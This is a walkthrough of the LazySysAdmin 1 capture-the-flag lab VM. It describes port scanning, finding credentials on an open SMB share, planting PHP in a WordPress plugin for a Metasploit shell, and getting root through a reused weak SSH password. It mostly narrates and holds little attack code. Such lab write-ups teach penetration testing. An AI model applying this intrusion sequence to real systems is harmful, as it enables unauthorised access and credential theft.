Walkthrough: LazySysAdmin 1
Author: Agoonie
Date: 2017-10-9
1. Target IP
VM is setup with host-only in VMware workstation. I identified the IP with a simple Nmap ping
sweep.
nmap -sn -v 192.168.126.2-254
2. NMAP Scan/Service ID
Now, on to the full scan to identify open ports and to
identify what services are running.
Next, I start to look at interesting ports, usually while
the scan is still going. I took note of
ports 80, 139, 445, and 3306. For port
80, I wanted to start to enumerate files and folder structure for the web
application. I usually use
dirb/dirbuster.
With dirb, I see folders for wordpress and phpmyadmin. I use wpscan to see if I can get any
information about the wordpress site being hosted. Sometimes, you can get users, plugins,
themes, etc.
The scan identified an admin user, wordpress version, a
theme and some links to look at. I noted
everything and went on to ports 139 and 445.
Bingo. I am able to
see files in the wordpress folder using the SMB service. If I can connect to it, maybe I can just read
and write to it. Next, put in a web
shell, escalate privs and then, game over.
No luck. I can only
read the files. I cannot write to the folder.
Well, let’s read some files.
It looks like the admin put in a password in the deets.txt
file. What else can we find? Maybe config files in the wordpress
folder.
The wp-config.php file might be good.
Looks like we have an account for the wordpress site. Let’s keep track of more creds and test them
out.
We have AntiSpam and Hello Dolly. A quick search for Hello Dolly and you see it
is used by hackers to add backdoors to sites.
I assume that means I can just add php code to it.
3. Exploit Execution
It has accepted and saved the php code I added to
hello.php Now, I just start a Metasploit
mult handler and browse to hello.php.
4. Escalating
Privileges
We are running as www-data.
How can we escalate? Let’s start
looking around to see if we find anything.
Looks like we have more credentials to take note of. We found the user togie, which is the admin
for the wordpress site. Maybe I can
start to test the creds for his account, togie.
There is ssh running on the server.
Let’s try.
The password 12345 worked for him. Well, he is the admin, maybe he is a sudo
user?
Conclusion:
Well, enumeration was key to root the box. I did not screen shot the process but I tried
every priv escalation root file from exploit-db.com. Every one of them failed. In addition, gcc and cc was not present on
the box. I created similar vm’s to compile
the code and uploaded the executables.
It did not matter. Every time I
got a credential, I could get to the next step on the vm. Great boot2root!